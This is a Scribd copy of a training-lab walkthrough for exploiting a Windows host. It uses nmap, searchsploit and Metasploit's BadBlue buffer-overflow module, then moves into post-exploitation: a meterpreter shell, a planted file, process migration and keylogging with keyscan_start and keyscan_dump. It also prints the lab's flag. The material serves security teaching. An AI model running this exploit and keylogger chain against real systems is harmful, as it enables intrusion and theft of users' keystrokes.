Scribd
Upload
45 views10 pages

Walkthrough 1955

This document outlines steps to exploit a Windows system using Metasploit: 1. Nmap is used to find an open port and vulnerable application on the target system. 2. Metasploit is used to exploit a buffer overflow in the Badblue web server and obtain a meterpreter session. 3. Keylogging and file creation commands are used from the meterpreter session to confirm exploitation.

Uploaded by

rivoluzioneai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
45 views10 pages

Walkthrough 1955

This document outlines steps to exploit a Windows system using Metasploit: 1. Nmap is used to find an open port and vulnerable application on the target system. 2. Metasploit is used to exploit a buffer overflow in the Badblue web server and obtain a meterpreter session. 3. Keylogging and file creation commands are used from the meterpreter session to confirm exploitation.

Uploaded by

rivoluzioneai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Name Post-Exploitation: File and Keylogging

URL https://attackdefense.com/challengedetails?cid=1955

Type Windows Exploitation: With Metasploit

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Checking target IP address.

Note: ​The target IP address is stored in the “target” file.

Command: ​cat /root/Desktop/target

Step 2:​ Run an Nmap scan against the target IP.

Command: ​nmap 10.0.0.71


Step 3: ​We have discovered that multiple ports are open. We will run nmap again to determine
version information on port 80.

Command: ​nmap -sV -p 80 10.0.0.71

Step 4: ​We will search the exploit module for badblue 2.7 using searchsploit.

Command: ​searchsploit badblue 2.7


Step 5: ​There is a metasploit module for badblue server. We will use PassThu remote buffer
overflow metasploit module to exploit the target.

Commands:
msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.0.71
exploit

We have successfully exploited the target vulnerable application (badblue) and received a
meterpreter shell.

Step 6: ​Searching the flag.

Command:​ shell
cd /
dir
type flag.txt

This reveals the flag to us.

Flag: ​70a569da306697d64fc6c19afea37d94

Step 7: ​Switch the directory to the Administrator’s Desktop and create a text file. i.e hacked.txt

Command: ​cd Users\\Administrator\\Desktop


dir
ECHO “You have been Hacked” > hacked.txt
Step 8: ​Verifying the created file on the victim machine.

Note: ​We can switch the view of “​Attacker Machine​” and “​Target Machine​” by clicking on one
of this tabs as shown in the below snapshot. It is located at the top left of the challenge window.
Step 9: ​Running a hacked.txt file from the attacker’s machine.

Note:​ Just enter the name of the file “hacked.txt” and press enter.

Command: ​hacked.txt

Step 10: ​Verifying if the hacked.txt file is open on the victim machine or not.
We have successfully created and launched a hacked.txt file from the attacker’s machine.

Step 11: ​Checking all the running processes on the target machine and migrating the current
process in ​explorer.exe​ process.

Command: ​ps

We can notice that explorer.exe pid is ​2724​. We will use this explorer.exe pid to migrate into this
process.

Command: ​migrate 2724


We have successfully migrated into the explorer.exe process.

Step 12: ​Running keyscan_start to capture keystrokes.

Command:​ keyscan_start

Step 13: ​Typing random texts in the notepad.


Step 14: ​Dump the keylogger data.

Command: ​keyscan_dump

We have successfully captured all the entered data in the notepad. i.e hacked.txt

References

1. BadBlue 2.72b - Multiple Vulnerabilities (​https://www.exploit-db.com/exploits/4715​)


2. Metasploit Module
(​https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru​)

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy